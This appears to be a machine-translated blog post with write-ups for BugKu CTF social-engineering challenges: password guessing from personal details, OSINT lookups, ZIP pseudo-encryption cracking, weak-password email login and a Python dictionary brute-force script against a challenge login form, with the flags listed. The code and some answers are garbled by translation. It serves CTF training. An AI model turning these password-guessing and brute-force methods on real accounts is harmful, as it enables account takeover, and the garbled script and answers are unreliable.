BugKu Social Engineering

This is the 9th day of my participation in the August Wen Challenge.More challenges in August

1, password,

Name: Zhang SAN birthday; 19970315 KEY format KEY{XXXXXXXXXX}

Zs, birthday, will do

Answer: the flag {zs199970315}

2. Information search

It is said that bugku.cn can be found on toutiao today. Tip: Flag is in the group number format KEY{XXXXXXXXXXX}

Analysis: Baidu search directly Answer: the KEY {462713425}

3. Simple personal information collection

1. Zip

Resolution:

First try blasting, and then consider ZIP pseudo-encryption, pseudo-encryption cracking tool:



Pseudo encryption solution, open after



The social worker’s website is down

Answer: the flag {15206164164}

4. Social worker advancement

Dry:

Analysis: Baidu post bar search solitary long away





Email should be weak password login, look up the weak password table, one by one try email 163 login,a123456

Answer: the KEY {sg1H78Si9C0s99Q}

5. Wang Xiaoming’s diary

Refer to the link

Resolution:

Note the following information:Bugku online tool

The tools used are:Online password attacks

Using online password attacks, generate dictionaries:



Get a dictionary



Then use the Python script to blow it up

import requests,re
 
def req(pwd) :
url='http://120.24.86.145:8002/xiaoming/? yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(R 'Password incorrect, please re-enter', response.text)
# print(b)
return b
 
def zidian() :
f = open('mima.txt'.'r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
 
 
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] = ='Incorrect password, please re-enter':
# print(b[0])
pass
except:
print(pwd)
break
 

Copy the code

Refer to the link

Python3.5 crack. Py WXMCopy the code

Password WXM

Answer: Flag {bugku-shegong_xMQ} reference link 1

6. Simple social worker attempts

Analytic: findneo. Making. IO / 180406 bugku… References: Reference link 1 Reference link 2 Reference link 3 github.com/bugku weibo.com/bugku c.bugku.com/13211.txt

Answer: the flag {BUku_open_shgcx1}